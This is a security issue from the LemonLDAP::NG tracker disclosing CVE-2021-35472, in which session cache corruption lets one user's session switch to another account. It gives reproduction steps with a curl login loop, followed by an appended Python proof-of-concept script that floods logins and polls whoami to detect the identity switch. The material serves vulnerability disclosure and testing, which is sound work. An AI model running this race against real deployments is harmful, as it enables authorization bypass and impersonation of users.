LemonLDAP NG / lemonldap-ng / Issues / #2539
Issue created Jun 08, 2021 by Christophe Maudoux (@maudoux, Maintainer)

[security:high, CVE-2021-35472] session cache corruption can lead to authorization bypass or spoofing

Concerned version

Version: 2.0.0 to 2.0.11

Platform: Nginx/uWSGI

Summary

  • Enable Impersonation plugin

  • Enable REST Session server

  • Disable CSRF tokens

  • Start a terminal and execute:

        for i in {1..1000}; do curl -X POST -H 'Accept:application/json' -d user=msmith --data-urlencode password='msmith' http://auth.example.com:19876; done

  • make reload

  • Log in as dwho/dwho/dwho and hit F5 to refresh the Portal

  • You are alternately authenticated as 'dwho' or 'msmith'

Backends used

PG

(attached screen recording: vokoscreen-2021-06-08_22-12-00)

Possible fixes

The issue seems to be linked to the handler's internal cache.

Log in with 'dwho' / 'dwho'

Enable the Impersonation plugin -> make reload_web_server

Start the bash loop, hit F5 and the session switches to 'msmith'

Stop the bash loop and the session is back to 'dwho' after 10-15 seconds.
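The reproduction steps above (the Summary list and the shorter sequence in "Possible fixes") can be scripted so the identity switch is recorded rather than eyeballed after F5. The script below is an added example and not part of the issue or of LemonLDAP::NG. It targets the dev portal at http://auth.example.com:19876 with the dwho/msmith accounts named in the issue, and assumes (these are assumptions, not stated on the page) that the Impersonation plugin and REST session server are enabled, CSRF tokens are disabled as in the steps, a REST login with Accept: application/json returns JSON of the form {"result":1,"id":"<session id>"}, and GET /mysession/?whoami returns {"result":"<uid>"} for the session named in the lemonldap cookie.

```python
"""Automated reproduction of the session-switch race from lemonldap-ng #2539.

Added example, not project code.  Assumed (not from the issue): the portal
answers a REST login with {"result":1,"id":"<sid>"} and answers
GET /mysession/?whoami with {"result":"<uid>"} for the `lemonldap` cookie.
"""
import json
import threading
import time
import urllib.parse
import urllib.request

PORTAL = "http://auth.example.com:19876"   # dev portal used in the issue
VICTIM = ("dwho", "dwho")                  # session we keep and poll
ATTACKER = ("msmith", "msmith")            # account hammered by the login loop


def rest_login(user, password, portal=PORTAL):
    """POST credentials to the portal; return the session id or None."""
    body = urllib.parse.urlencode({"user": user, "password": password}).encode()
    req = urllib.request.Request(portal, data=body, method="POST",
                                 headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        data = json.loads(resp.read())
    return data.get("id") if data.get("result") == 1 else None


def whoami(session_id, portal=PORTAL):
    """Ask the portal which user the given session cookie resolves to (assumed endpoint)."""
    req = urllib.request.Request(portal + "/mysession/?whoami",
                                 headers={"Accept": "application/json",
                                          "Cookie": "lemonldap=" + session_id})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return json.loads(resp.read()).get("result")


def login_storm(stop, user, password):
    """Background equivalent of the issue's `for i in {1..1000}; do curl ...` loop."""
    while not stop.is_set():
        try:
            rest_login(user, password)
        except Exception:
            pass  # a failed request is fine; we only need pressure on the cache


def analyse(expected, observations):
    """Return (poll index, uid) for every poll that did not answer `expected`.

    Pure function so the detection logic can be checked offline; an empty list
    means the session stayed bound to the user who logged in.
    """
    return [(i, uid) for i, uid in enumerate(observations) if uid != expected]


def reproduce(polls=50, interval=0.2):
    """Log in as the victim, run the attacker login loop, poll who the session is."""
    sid = rest_login(*VICTIM)
    if not sid:
        raise SystemExit("victim login failed")
    stop = threading.Event()
    t = threading.Thread(target=login_storm, args=(stop, *ATTACKER), daemon=True)
    t.start()
    seen = []
    try:
        for _ in range(polls):
            seen.append(whoami(sid))   # should always be 'dwho' on a fixed build
            time.sleep(interval)
    finally:
        stop.set()
        t.join()
    return seen


if __name__ == "__main__":
    observed = reproduce()
    switches = analyse(VICTIM[0], observed)
    print("identity switches:", switches or "none (fixed build or not reproduced)")
```

On an affected build (2.0.0 to 2.0.11 per the issue) the printed list should contain entries with uid 'msmith' while the loop runs; on a fixed build `analyse` returns an empty list for every poll.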

Edited Jun 25, 2021 by Yadd